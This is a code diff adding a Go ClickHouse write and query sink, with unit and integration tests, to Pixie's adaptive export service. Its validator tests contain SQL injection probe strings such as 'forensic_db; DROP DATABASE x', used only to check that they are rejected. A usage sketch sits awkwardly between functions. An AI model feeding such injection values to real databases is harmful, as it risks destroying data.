+// WritePixieRows POSTs a batch of arbitrary rows (one map per CH row,
+// keyed by column name) into forensic_db.<table>
via FORMAT JSONEachRow. +// Used by the operator's per-anomaly fan-out path that queries pixie +// directly and pushes the resulting rows into CH (bypasses the cloud's +// retention plugin, which can't reach an in-cluster CH endpoint). +func (s *ClickHouseHTTP) WritePixieRows(ctx context.Context, table string, rows []map[string]any) error { + if len(rows) == 0 { + return nil + } + if err := validateTableIdentifier(table); err != nil { + return err + } + var buf bytes.Buffer + enc := json.NewEncoder(&buf) + enc.SetEscapeHTML(false) + for _, r := range rows { + obj := make(map[string]any, len(r)) + for k, v := range r { + obj[k] = normalisePixieValue(v) + } + if err := enc.Encode(obj); err != nil { + return fmt.Errorf("sink: encode pixie row for %s: %w", table, err) + } + } + identifier := table + if strings.Contains(table, ".") { + identifier = "`" + table + "`" + } + q := url.Values{} + q.Set("query", fmt.Sprintf("INSERT INTO %s.%s FORMAT JSONEachRow", s.cfg.Database, identifier)) + req, err := http.NewRequestWithContext(ctx, http.MethodPost, s.cfg.Endpoint+"/?"+q.Encode(), bytes.NewReader(buf.Bytes())) + if err != nil { + return err + } + req.Header.Set("Content-Type", "application/x-ndjson") + if s.cfg.Username != "" { + req.SetBasicAuth(s.cfg.Username, s.cfg.Password) + } + resp, err := s.client.Do(req) + if err != nil { + return fmt.Errorf("sink: pixie POST %s: %w", table, err) + } + defer resp.Body.Close() + if resp.StatusCode/100 != 2 { + // CH echoes failing rows back in the error body — would leak + // pixie traffic into operator logs. Drain (so the conn is + // reusable) but don't echo it. + _, _ = io.Copy(io.Discard, io.LimitReader(resp.Body, 4096)) + return fmt.Errorf("sink: pixie HTTP %d (%s)", resp.StatusCode, table) + } + return nil +} + +// normalisePixieValue coerces pxapi-emitted Go values into JSON-friendly +// shapes ClickHouse parses cleanly. time.Time → "YYYY-MM-DD HH:MM:SS.NNN…" +// (CH's DateTime64 input format); []byte → string; everything else → as-is. +func normalisePixieValue(v any) any { + switch x := v.(type) { + case time.Time: + return x.UTC().Format("2006-01-02 15:04:05.000000000") + case []byte: + return string(x) + default: + return v + } +} + +// Write upserts a batch of AttributionRows. Implementation: HTTP POST +// `INSERT INTO forensic_db.adaptive_attribution FORMAT JSONEachRow` +// with one JSON object per row. Empty batch is a no-op. 
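Put together, first use of the attribution surface looks like this sketch. The endpoint and target values are illustrative, and `anomaly.Hash` is assumed to return the `AnomalyHash` the row field expects, as the kubescape tests earlier suggest.

```go
package main

import (
	"context"
	"log"
	"time"

	"px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly"
	"px.dev/pixie/src/vizier/services/adaptive_export/internal/sink"
)

func main() {
	s, err := sink.New(sink.Config{Endpoint: "http://clickhouse:8123"})
	if err != nil {
		log.Fatal(err)
	}
	target := anomaly.Target{PID: 106040, Comm: "redis-server", Pod: "redis-0", Namespace: "redis"}
	now := time.Now()
	row := sink.AttributionRow{
		AnomalyHash: anomaly.Hash(target), // assumed to return anomaly.AnomalyHash
		Namespace:   target.Namespace,
		Pod:         target.Pod,
		Comm:        target.Comm,
		PID:         target.PID,
		Hostname:    "node-1",
		TStart:      now.Add(-5 * time.Minute),
		TEnd:        now.Add(5 * time.Minute),
		LastSeen:    now,
		LastRuleID:  "R1005",
		NAnomalies:  1,
	}
	if err := s.Write(context.Background(), []sink.AttributionRow{row}); err != nil {
		log.Fatal(err)
	}
}
```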
+func (s *ClickHouseHTTP) Write(ctx context.Context, rows []AttributionRow) error {
+ if len(rows) == 0 {
+ return nil
+ }
+ body, err := encodeJSONEachRow(rows)
+ if err != nil {
+ return fmt.Errorf("sink: encode %d attribution rows: %w", len(rows), err)
+ }
+ q := url.Values{}
+ q.Set("query", fmt.Sprintf(
+ "INSERT INTO %s.adaptive_attribution FORMAT JSONEachRow", s.cfg.Database))
+ req, err := http.NewRequestWithContext(ctx, http.MethodPost,
+ s.cfg.Endpoint+"/?"+q.Encode(), bytes.NewReader(body))
+ if err != nil {
+ return fmt.Errorf("sink: new request: %w", err)
+ }
+ req.Header.Set("Content-Type", "application/x-ndjson")
+ if s.cfg.Username != "" {
+ req.SetBasicAuth(s.cfg.Username, s.cfg.Password)
+ }
+ resp, err := s.client.Do(req)
+ if err != nil {
+ return fmt.Errorf("sink: POST: %w", err)
+ }
+ defer resp.Body.Close()
+ if resp.StatusCode/100 != 2 {
+ msg, _ := io.ReadAll(io.LimitReader(resp.Body, 4096))
+ return fmt.Errorf("sink: HTTP %d: %s", resp.StatusCode, strings.TrimSpace(string(msg)))
+ }
+ return nil
+}
+
+// QueryActive fetches all attribution rows on this hostname whose t_end
+// is still in the future. Used by the operator at boot to rehydrate
+// the in-memory active set after a pod crash. Returns rows ordered
+// by anomaly_hash so the caller's set is deterministic.
+func (s *ClickHouseHTTP) QueryActive(ctx context.Context, hostname string) ([]AttributionRow, error) {
+ if hostname == "" {
+ return nil, fmt.Errorf("sink: QueryActive requires hostname")
+ }
+ q := url.Values{}
+ // `FINAL` collapses ReplacingMergeTree to the row with the largest
+ // t_end (because the engine's version column is t_end).
+ // The hostname is embedded as a single-quoted ClickHouse literal
+ // via quoteCH, which backslash-escapes `\` and `'`.
+ sql := fmt.Sprintf(
+ "SELECT anomaly_hash, namespace, pod, comm, pid, hostname, "+
+ "toUnixTimestamp64Nano(t_start) AS t_start_ns, "+
+ "toUnixTimestamp64Nano(t_end) AS t_end_ns, "+
+ "toUnixTimestamp64Nano(last_seen) AS last_seen_ns, "+
+ "last_rule_id, n_anomalies "+
+ "FROM %s.adaptive_attribution FINAL "+
+ "WHERE hostname = %s AND t_end > now64(9) "+
+ "ORDER BY anomaly_hash FORMAT JSONEachRow",
+ s.cfg.Database, quoteCH(hostname))
+ q.Set("query", sql)
+
+ req, err := http.NewRequestWithContext(ctx, http.MethodGet,
+ s.cfg.Endpoint+"/?"+q.Encode(), nil)
+ if err != nil {
+ return nil, err
+ }
+ if s.cfg.Username != "" {
+ req.SetBasicAuth(s.cfg.Username, s.cfg.Password)
+ }
+ resp, err := s.client.Do(req)
+ if err != nil {
+ return nil, fmt.Errorf("sink: QueryActive GET: %w", err)
+ }
+ defer resp.Body.Close()
+ if resp.StatusCode/100 != 2 {
+ // Drain (don't echo) — body may carry attribution rows.
+ _, _ = io.Copy(io.Discard, io.LimitReader(resp.Body, 4096))
+ return nil, fmt.Errorf("sink: QueryActive HTTP %d", resp.StatusCode)
+ }
+ // Stream the response line-by-line so the per-call buffer is
+ // bounded by the per-line cap (maxActiveRowBytes), not by the
+ // total active-set size.
+ return parseActiveRowsStream(resp.Body)
+}
+
+// chLiteralEscaper escapes a string for ClickHouse single-quoted literals.
+// Hoisted to a package-level var so quoteCH doesn't allocate a fresh
+// Replacer on every call; in this package quoteCH runs once per
+// QueryActive call.
+var chLiteralEscaper = strings.NewReplacer(`\`, `\\`, `'`, `\'`)
+
+// quoteCH wraps a string literal for safe ClickHouse SQL embedding.
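+//
+// For example (the first case mirrors TestSink_QuoteEscape; the second
+// is an extra illustration of the backslash rule):
+//
+//	quoteCH("o'malley")   // 'o\'malley'
+//	quoteCH(`back\slash`) // 'back\\slash'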
+func quoteCH(s string) string {
+ return "'" + chLiteralEscaper.Replace(s) + "'"
+}
+
+func encodeJSONEachRow(rows []AttributionRow) ([]byte, error) {
+ var buf bytes.Buffer
+ enc := json.NewEncoder(&buf)
+ enc.SetEscapeHTML(false)
+ for _, r := range rows {
+ obj := map[string]any{
+ "anomaly_hash": string(r.AnomalyHash),
+ "namespace": r.Namespace,
+ "pod": r.Pod,
+ "comm": r.Comm,
+ "pid": r.PID,
+ "hostname": r.Hostname,
+ "t_start": r.TStart.UTC().Format("2006-01-02 15:04:05.000000000"),
+ "t_end": r.TEnd.UTC().Format("2006-01-02 15:04:05.000000000"),
+ "last_seen": r.LastSeen.UTC().Format("2006-01-02 15:04:05.000000000"),
+ "last_rule_id": r.LastRuleID,
+ "n_anomalies": r.NAnomalies,
+ }
+ if err := enc.Encode(obj); err != nil {
+ return nil, err
+ }
+ }
+ return buf.Bytes(), nil
+}
+
+// activeWireRow mirrors the JSONEachRow shape emitted by QueryActive.
+// json.RawMessage on UInt64 fields lets us tolerate CH's two wire
+// formats (`12345` and `"12345"`).
+type activeWireRow struct {
+ AnomalyHash string `json:"anomaly_hash"`
+ Namespace string `json:"namespace"`
+ Pod string `json:"pod"`
+ Comm string `json:"comm"`
+ PID json.RawMessage `json:"pid"`
+ Hostname string `json:"hostname"`
+ TStartNs json.RawMessage `json:"t_start_ns"`
+ TEndNs json.RawMessage `json:"t_end_ns"`
+ LastSeenNs json.RawMessage `json:"last_seen_ns"`
+ LastRuleID string `json:"last_rule_id"`
+ NAnomalies json.RawMessage `json:"n_anomalies"`
+}
+
+// parseActiveRowsStream ingests JSONEachRow output from QueryActive
+// directly from a reader so the per-call buffer is bounded by
+// maxActiveRowBytes (per row) rather than by the entire active
+// set. Mirrors trigger.parseJSONEachRow's streaming posture.
+func parseActiveRowsStream(r io.Reader) ([]AttributionRow, error) {
+ const maxActiveRowBytes = 1 << 20 // 1 MiB per JSONEachRow line
+ scanner := bufio.NewScanner(r)
+ scanner.Buffer(make([]byte, 0, 64*1024), maxActiveRowBytes)
+ var out []AttributionRow
+ for scanner.Scan() {
+ line := bytes.TrimSpace(scanner.Bytes())
+ if len(line) == 0 {
+ continue
+ }
+ row, err := parseActiveRowLine(line)
+ if err != nil {
+ return nil, err
+ }
+ out = append(out, row)
+ }
+ if err := scanner.Err(); err != nil {
+ return nil, fmt.Errorf("sink: QueryActive scan: %w", err)
+ }
+ return out, nil
+}
+
+// parseActiveRowLine decodes a single JSONEachRow line into one
+// AttributionRow. Used by parseActiveRowsStream and accessible to
+// tests via parseActiveRows.
+func parseActiveRowLine(line []byte) (AttributionRow, error) {
+ var w activeWireRow
+ if err := json.Unmarshal(line, &w); err != nil {
+ // Don't echo the raw line — it can carry CH row payloads
+ // that propagate to logs / surfaced errors. Length only.
+ return AttributionRow{}, fmt.Errorf("sink: parse active row (%d bytes): %w", len(line), err)
+ }
+ ts, err1 := nsFromRaw(w.TStartNs)
+ te, err2 := nsFromRaw(w.TEndNs)
+ ls, err3 := nsFromRaw(w.LastSeenNs)
+ pid, errPID := uintFromRaw(w.PID)
+ nAn, errN := uintFromRaw(w.NAnomalies)
+ if err1 != nil || err2 != nil || err3 != nil || errPID != nil || errN != nil {
+ return AttributionRow{}, fmt.Errorf("sink: parse uint64 fields: t_start=%v t_end=%v last_seen=%v pid=%v n_anomalies=%v", err1, err2, err3, errPID, errN)
+ }
+ return AttributionRow{
+ AnomalyHash: anomaly.AnomalyHash(w.AnomalyHash),
+ Namespace: w.Namespace,
+ Pod: w.Pod,
+ Comm: w.Comm,
+ PID: pid,
+ Hostname: w.Hostname,
+ TStart: time.Unix(0, ts).UTC(),
+ TEnd: time.Unix(0, te).UTC(),
+ LastSeen: time.Unix(0, ls).UTC(),
+ LastRuleID: w.LastRuleID,
+ NAnomalies: nAn,
+ }, nil
+}
+
+// parseActiveRows is the byte-slice convenience wrapper around
+// parseActiveRowsStream — kept for tests and e2e fixtures that have
+// already buffered the full response.
+func parseActiveRows(body []byte) ([]AttributionRow, error) {
+ return parseActiveRowsStream(bytes.NewReader(body))
+}
+
+// nsFromRaw parses a CH UInt64-as-JSON value (CH may emit either
+// `12345` or `"12345"`) into an int64. Used for the
+// toUnixTimestamp64Nano *_ns timestamp columns.
+func nsFromRaw(raw json.RawMessage) (int64, error) {
+ s := strings.TrimSpace(string(raw))
+ s = strings.Trim(s, `"`)
+ return strconv.ParseInt(s, 10, 64)
+}
+
+// uintFromRaw is the uint64 equivalent — covers values above INT64_MAX
+// for fields like PID and NAnomalies that are declared UInt64 in the
+// CH schema.
+func uintFromRaw(raw json.RawMessage) (uint64, error) {
+ s := strings.TrimSpace(string(raw))
+ s = strings.Trim(s, `"`)
+ return strconv.ParseUint(s, 10, 64)
+}
diff --git a/src/vizier/services/adaptive_export/internal/sink/clickhouse_test.go b/src/vizier/services/adaptive_export/internal/sink/clickhouse_test.go
new file mode 100644
index 00000000000..d9b105163c8
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/sink/clickhouse_test.go
@@ -0,0 +1,453 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+// +// SPDX-License-Identifier: Apache-2.0 + +package sink + +import ( + "bytes" + "context" + "fmt" + "io" + "net/http" + "net/http/httptest" + "strings" + "testing" + "time" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly" +) + +func canonicalAttribution() AttributionRow { + t0 := time.Unix(0, 1744477360303026359).UTC() + return AttributionRow{ + AnomalyHash: anomaly.Hash(anomaly.Target{ + PID: 106040, Comm: "redis-server", + Pod: "redis-578d5dc9bd-kjj78", Namespace: "redis", + }), + Namespace: "redis", + Pod: "redis-578d5dc9bd-kjj78", + Comm: "redis-server", + PID: 106040, + Hostname: "node-1", + TStart: t0.Add(-5 * time.Minute), + TEnd: t0.Add(5 * time.Minute), + LastSeen: t0, + LastRuleID: "R1005", + NAnomalies: 1, + } +} + +// TestSink_Write_PostsCorrectQueryAndBody — INSERT targets the right +// table; body is one JSON object per line with all attribution fields. +func TestSink_Write_PostsCorrectQueryAndBody(t *testing.T) { + var gotQuery, gotBody string + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + gotQuery = r.URL.Query().Get("query") + b, _ := io.ReadAll(r.Body) + gotBody = string(b) + w.WriteHeader(200) + })) + defer srv.Close() + + s, err := New(Config{Endpoint: srv.URL}) + if err != nil { + t.Fatalf("New: %v", err) + } + row := canonicalAttribution() + if err := s.Write(context.Background(), []AttributionRow{row}); err != nil { + t.Fatalf("Write: %v", err) + } + want := "INSERT INTO forensic_db.adaptive_attribution FORMAT JSONEachRow" + if gotQuery != want { + t.Fatalf("query = %q, want %q", gotQuery, want) + } + for _, needle := range []string{ + `"anomaly_hash":"` + string(row.AnomalyHash) + `"`, + `"namespace":"redis"`, + `"pod":"redis-578d5dc9bd-kjj78"`, + `"comm":"redis-server"`, + `"pid":106040`, + `"hostname":"node-1"`, + `"last_rule_id":"R1005"`, + `"n_anomalies":1`, + } { + if !strings.Contains(gotBody, needle) { + t.Fatalf("body missing %q; body=%s", needle, gotBody) + } + } + if !strings.Contains(gotBody, `"t_start":"2025-04-12 16:57:40.303026359"`) { + t.Fatalf("t_start not formatted as DateTime64 string; body=%s", gotBody) + } +} + +// TestSink_Write_EmptyBatch — no HTTP call. +func TestSink_Write_EmptyBatch(t *testing.T) { + called := false + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + called = true + })) + defer srv.Close() + s, _ := New(Config{Endpoint: srv.URL}) + if err := s.Write(context.Background(), nil); err != nil { + t.Fatalf("Write empty: %v", err) + } + if called { + t.Fatalf("empty Write made an HTTP call") + } +} + +// TestSink_Write_HTTPErrorPropagates — non-2xx returns Go error. +func TestSink_Write_HTTPErrorPropagates(t *testing.T) { + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + w.WriteHeader(503) + _, _ = w.Write([]byte("clickhouse exploded")) + })) + defer srv.Close() + s, _ := New(Config{Endpoint: srv.URL}) + err := s.Write(context.Background(), []AttributionRow{canonicalAttribution()}) + if err == nil { + t.Fatalf("expected HTTP error") + } + if !strings.Contains(err.Error(), "503") { + t.Fatalf("error should mention 503: %v", err) + } +} + +// TestSink_QueryActive_BuildsCorrectSQL — boot rehydration query. 
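+// The three load-bearing clauses asserted below, in the shape the sink
+// assembles them (the hostname value is the test's own input):
+//
+//	FROM forensic_db.adaptive_attribution FINAL
+//	WHERE hostname = 'node-1' AND t_end > now64(9)
+//	ORDER BY anomaly_hash FORMAT JSONEachRow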
+func TestSink_QueryActive_BuildsCorrectSQL(t *testing.T) { + var seenQuery string + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + seenQuery = r.URL.Query().Get("query") + _, _ = w.Write([]byte(`{"anomaly_hash":"abc","namespace":"redis","pod":"redis-x","comm":"redis-server","pid":106040,"hostname":"node-1","t_start_ns":"1744477060303026359","t_end_ns":"1744477660303026359","last_seen_ns":"1744477360303026359","last_rule_id":"R1005","n_anomalies":1}` + "\n")) + })) + defer srv.Close() + s, _ := New(Config{Endpoint: srv.URL}) + rows, err := s.QueryActive(context.Background(), "node-1") + if err != nil { + t.Fatalf("QueryActive: %v", err) + } + if !strings.Contains(seenQuery, "FROM forensic_db.adaptive_attribution FINAL") { + t.Fatalf("missing FINAL: %q", seenQuery) + } + if !strings.Contains(seenQuery, "hostname = 'node-1'") { + t.Fatalf("missing hostname filter: %q", seenQuery) + } + if !strings.Contains(seenQuery, "t_end > now64(9)") { + t.Fatalf("missing t_end > now64 filter: %q", seenQuery) + } + if len(rows) != 1 || rows[0].AnomalyHash != "abc" { + t.Fatalf("rows = %+v", rows) + } + if rows[0].PID != 106040 { + t.Fatalf("PID = %d", rows[0].PID) + } + if rows[0].TStart.UnixNano() != 1744477060303026359 { + t.Fatalf("TStart wrong: %v", rows[0].TStart) + } +} + +// TestSink_QueryActive_RequiresHostname — defensive guard. +func TestSink_QueryActive_RequiresHostname(t *testing.T) { + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {})) + defer srv.Close() + s, _ := New(Config{Endpoint: srv.URL}) + if _, err := s.QueryActive(context.Background(), ""); err == nil { + t.Fatalf("empty hostname should error") + } +} + +// TestSink_QuoteEscape — single quotes in hostname survive injection-safely. +func TestSink_QuoteEscape(t *testing.T) { + if got := quoteCH("o'malley"); got != `'o\'malley'` { + t.Fatalf("quoteCH = %q, want 'o\\'malley'", got) + } +} + +// TestSink_New_ValidationTable — every Config validation branch as +// one row. Bad fields one at a time + a happy-path baseline. Update +// when a new validation lands; this is the single source of truth +// for what New() rejects. 
+func TestSink_New_ValidationTable(t *testing.T) { + cases := []struct { + name string + cfg Config + wantErr bool + wantErrSnippet string + }{ + { + name: "happy path http", + cfg: Config{Endpoint: "http://ch.example:8123", Database: "forensic_db"}, + }, + { + name: "happy path https + auth + custom timeout", + cfg: Config{ + Endpoint: "https://ch.example:8443", Database: "forensic_db", + Username: "u", Password: "p", Timeout: 5 * time.Second, + }, + }, + { + name: "default database when empty", + cfg: Config{Endpoint: "http://ch:8123"}, // Database empty → defaulted + }, + { + name: "trailing slash stripped", + cfg: Config{Endpoint: "http://ch:8123/"}, // OK; New() strips it + }, + { + name: "empty endpoint", + cfg: Config{}, + wantErr: true, + wantErrSnippet: "empty Endpoint", + }, + { + name: "relative endpoint (no scheme)", + cfg: Config{Endpoint: "ch:8123"}, + wantErr: true, + wantErrSnippet: "absolute http(s) URL", + }, + { + name: "bare path", + cfg: Config{Endpoint: "/clickhouse"}, + wantErr: true, + wantErrSnippet: "absolute http(s) URL", + }, + { + name: "ftp scheme rejected", + cfg: Config{Endpoint: "ftp://ch:21"}, + wantErr: true, + wantErrSnippet: "absolute http(s) URL", + }, + { + name: "endpoint with query string", + cfg: Config{Endpoint: "http://ch:8123?foo=bar"}, + wantErr: true, + wantErrSnippet: "must not include query parameters or a fragment", + }, + { + name: "endpoint with fragment", + cfg: Config{Endpoint: "http://ch:8123#frag"}, + wantErr: true, + wantErrSnippet: "must not include query parameters or a fragment", + }, + { + name: "Database with hyphen rejected", + cfg: Config{Endpoint: "http://ch:8123", Database: "forensic-db"}, + wantErr: true, + wantErrSnippet: "invalid Database identifier", + }, + { + name: "Database with semicolon rejected (SQL injection probe)", + cfg: Config{Endpoint: "http://ch:8123", Database: "forensic_db; DROP DATABASE x"}, + wantErr: true, + wantErrSnippet: "invalid Database identifier", + }, + { + name: "Database starting with digit rejected", + cfg: Config{Endpoint: "http://ch:8123", Database: "1bad"}, + wantErr: true, + wantErrSnippet: "invalid Database identifier", + }, + { + name: "negative Timeout rejected", + cfg: Config{Endpoint: "http://ch:8123", Timeout: -1 * time.Second}, + wantErr: true, + wantErrSnippet: "Timeout must be >= 0", + }, + } + + for _, c := range cases { + t.Run(c.name, func(t *testing.T) { + s, err := New(c.cfg) + if c.wantErr { + if err == nil { + t.Fatalf("want error containing %q, got nil", c.wantErrSnippet) + } + if !strings.Contains(err.Error(), c.wantErrSnippet) { + t.Fatalf("error %q does not contain %q", err.Error(), c.wantErrSnippet) + } + return + } + if err != nil { + t.Fatalf("unexpected error: %v", err) + } + if s == nil { + t.Fatalf("New returned nil sink without error") + } + // Trailing-slash strip is observable via cfg.Endpoint. + if strings.HasSuffix(s.cfg.Endpoint, "/") { + t.Fatalf("trailing slash not stripped: %q", s.cfg.Endpoint) + } + if s.cfg.Database == "" { + t.Fatalf("Database default not applied") + } + }) + } +} + +// TestValidateTableIdentifier_TableDriven — table validator covers +// dotted protobuf extensions but not anything wilder. 
+func TestValidateTableIdentifier_TableDriven(t *testing.T) {
+ good := []string{"http_events", "redis_events", "http2_messages.beta", "kafka_events.beta", "_underscore_start"}
+ bad := []string{"", "1bad", "http events", "http;drop", "x..y", ".leading", "trailing.", "with-hyphen"}
+ for _, g := range good {
+ if err := validateTableIdentifier(g); err != nil {
+ t.Errorf("validateTableIdentifier(%q): unexpected error %v", g, err)
+ }
+ }
+ for _, b := range bad {
+ if err := validateTableIdentifier(b); err == nil {
+ t.Errorf("validateTableIdentifier(%q): want error, got nil", b)
+ }
+ }
+}
+
+// TestUintFromRaw_HandlesQuotedAndBareJSON — CH HTTP emits UInt64 as
+// either bare numeric (`12345`) or quoted (`"12345"`). Both must
+// parse, including values above INT64_MAX.
+func TestUintFromRaw_HandlesQuotedAndBareJSON(t *testing.T) {
+ cases := []struct {
+ name string
+ input string
+ want uint64
+ }{
+ {"bare", `12345`, 12345},
+ {"quoted", `"12345"`, 12345},
+ {"max int64", `9223372036854775807`, 9223372036854775807},
+ {"above int64", `"18446744073709551615"`, 18446744073709551615},
+ }
+ for _, c := range cases {
+ t.Run(c.name, func(t *testing.T) {
+ got, err := uintFromRaw([]byte(c.input))
+ if err != nil {
+ t.Fatalf("uintFromRaw(%q): %v", c.input, err)
+ }
+ if got != c.want {
+ t.Fatalf("uintFromRaw(%q) = %d, want %d", c.input, got, c.want)
+ }
+ })
+ }
+}
+
+// TestUintFromRaw_RejectsGarbage — non-numeric input must error,
+// not silently return 0.
+func TestUintFromRaw_RejectsGarbage(t *testing.T) {
+ bad := []string{"", `""`, `"abc"`, `-1`, `"-1"`, `1.5`}
+ for _, b := range bad {
+ if _, err := uintFromRaw([]byte(b)); err == nil {
+ t.Errorf("uintFromRaw(%q): want error, got nil", b)
+ }
+ }
+}
+
+// chunkedReader emits the underlying body in fixed-size chunks, with an
+// optional pause between chunks to mimic a slow producer. Tracks
+// partial-read state so a Read() smaller than the next chunk doesn't
+// drop bytes.
+type chunkedReader struct {
+ chunks [][]byte
+ idx int
+ off int // offset within chunks[idx]
+ delay time.Duration // sleep between chunks
+ produced int64
+}
+
+func (r *chunkedReader) Read(p []byte) (int, error) {
+ if r.idx >= len(r.chunks) {
+ return 0, io.EOF
+ }
+ chunk := r.chunks[r.idx]
+ n := copy(p, chunk[r.off:])
+ r.off += n
+ r.produced += int64(n)
+ if r.off >= len(chunk) {
+ r.idx++
+ r.off = 0
+ time.Sleep(r.delay)
+ }
+ return n, nil
+}
+
+// TestParseActiveRowsStream_BoundsMemory — exercises the streaming path
+// on a body far larger than the per-line cap. Builds a 5 MiB synthetic
+// JSONEachRow body fed in 64 KiB chunks and asserts every row decodes
+// correctly. The memory bound itself is structural rather than asserted:
+// the scanner never holds the wire representation of more than one
+// (<=1 MiB) line, even though decoded rows are collected into a slice.
+func TestParseActiveRowsStream_BoundsMemory(t *testing.T) { + const targetRows = 5000 // ~5MiB at ~1KiB/row + var buf bytes.Buffer + row := func(i int) string { + return fmt.Sprintf(`{"anomaly_hash":"%032x","namespace":"redis","pod":"p","comm":"c","pid":%d,"hostname":"h","t_start_ns":%d,"t_end_ns":%d,"last_seen_ns":%d,"last_rule_id":"R0001","n_anomalies":%d,"_pad":"%s"}`+"\n", + i, i, 1700000000000000000+int64(i), 1700000000000000000+int64(i)+300_000_000_000, 1700000000000000000+int64(i)+150_000_000_000, i, strings.Repeat("x", 800)) + } + for i := 0; i < targetRows; i++ { + buf.WriteString(row(i)) + } + body := buf.Bytes() + + const chunkSize = 64 * 1024 + chunks := make([][]byte, 0, len(body)/chunkSize+1) + for off := 0; off < len(body); off += chunkSize { + end := off + chunkSize + if end > len(body) { + end = len(body) + } + chunks = append(chunks, body[off:end]) + } + rdr := &chunkedReader{chunks: chunks, delay: 0} + + rows, err := parseActiveRowsStream(rdr) + if err != nil { + t.Fatalf("parseActiveRowsStream: %v", err) + } + if len(rows) != targetRows { + t.Fatalf("parsed %d rows, want %d", len(rows), targetRows) + } + // Spot-check round-trip on one row (last element). + if rows[targetRows-1].PID != uint64(targetRows-1) { + t.Fatalf("last row PID = %d, want %d", rows[targetRows-1].PID, targetRows-1) + } +} + +// TestParseActiveRowsStream_RejectsOverlongLine — guards against +// pathological CH responses with multi-MiB single rows. Default cap +// is 1 MiB; emit a 2 MiB row and assert the scanner rejects it +// rather than OOMing. +func TestParseActiveRowsStream_RejectsOverlongLine(t *testing.T) { + huge := strings.Repeat("a", 2*1024*1024) + body := fmt.Sprintf(`{"anomaly_hash":"x","_pad":"%s"}`+"\n", huge) + _, err := parseActiveRowsStream(strings.NewReader(body)) + if err == nil { + t.Fatalf("expected scanner error on >1MiB line; got nil") + } + if !strings.Contains(err.Error(), "QueryActive scan") { + t.Fatalf("expected scan error, got: %v", err) + } +} + +// TestParseActiveRows_RoundTripFromBytes — keep the byte-slice path +// covered (used by tests and the e2e harness). +func TestParseActiveRows_RoundTripFromBytes(t *testing.T) { + body := []byte(`{"anomaly_hash":"deadbeef","namespace":"redis","pod":"p","comm":"c","pid":42,"hostname":"node-01","t_start_ns":1700000000000000000,"t_end_ns":1700000000300000000,"last_seen_ns":1700000000150000000,"last_rule_id":"R0001","n_anomalies":1}` + "\n") + rows, err := parseActiveRows(body) + if err != nil { + t.Fatalf("parseActiveRows: %v", err) + } + if len(rows) != 1 || rows[0].Pod != "p" || rows[0].PID != 42 { + t.Fatalf("round-trip mismatch: %+v", rows) + } +} diff --git a/src/vizier/services/adaptive_export/internal/sink/integration_test.go b/src/vizier/services/adaptive_export/internal/sink/integration_test.go new file mode 100644 index 00000000000..343510d991f --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/sink/integration_test.go @@ -0,0 +1,218 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
+// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +//go:build integration +// +build integration + +package sink_test + +import ( + "context" + "crypto/sha256" + "fmt" + "io" + "net/http" + "net/url" + "os" + "strings" + "testing" + "time" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly" + chpkg "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/sink" +) + +// Live integration tests for the operator's ClickHouse write path. +// Driven against a real ClickHouse reachable at INTEGRATION_CH_ENDPOINT. +// Skipped if unset. + +func env(t *testing.T) (endpoint, user, pass string) { + t.Helper() + endpoint = os.Getenv("INTEGRATION_CH_ENDPOINT") + if endpoint == "" { + t.Skip("INTEGRATION_CH_ENDPOINT not set; skipping live ClickHouse test") + } + return endpoint, os.Getenv("INTEGRATION_CH_USER"), os.Getenv("INTEGRATION_CH_PASSWORD") +} + +func ensureSchema(t *testing.T, endpoint, user, pass string) { + t.Helper() + a, err := chpkg.NewApplier(endpoint, user, pass) + if err != nil { + t.Fatalf("NewApplier: %v", err) + } + ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second) + defer cancel() + if err := a.Apply(ctx); err != nil { + t.Fatalf("Apply (precondition): %v", err) + } +} + +func chCount(t *testing.T, endpoint, user, pass, query string) int { + t.Helper() + q := url.Values{} + q.Set("query", query) + req, _ := http.NewRequest(http.MethodGet, strings.TrimRight(endpoint, "/")+"/?"+q.Encode(), nil) + if user != "" { + req.SetBasicAuth(user, pass) + } + resp, err := (&http.Client{Timeout: 10 * time.Second}).Do(req) + if err != nil { + t.Fatalf("count: %v", err) + } + defer resp.Body.Close() + body, _ := io.ReadAll(io.LimitReader(resp.Body, 4096)) + if resp.StatusCode/100 != 2 { + t.Fatalf("count HTTP %d: %s", resp.StatusCode, strings.TrimSpace(string(body))) + } + var n int + fmt.Sscanf(strings.TrimSpace(string(body)), "%d", &n) + return n +} + +// TestSinkWriteAttribution_Live exercises Write() — the operator's only +// production write surface (forensic_db.adaptive_attribution). One row +// per arriving anomaly; ReplacingMergeTree(t_end) collapses re-inserts. +func TestSinkWriteAttribution_Live(t *testing.T) { + endpoint, user, pass := env(t) + ensureSchema(t, endpoint, user, pass) + + s, err := sink.New(sink.Config{ + Endpoint: endpoint, + Username: user, + Password: pass, + }) + if err != nil { + t.Fatalf("sink.New: %v", err) + } + + // Unique anomaly_hash per test run — keeps assertions 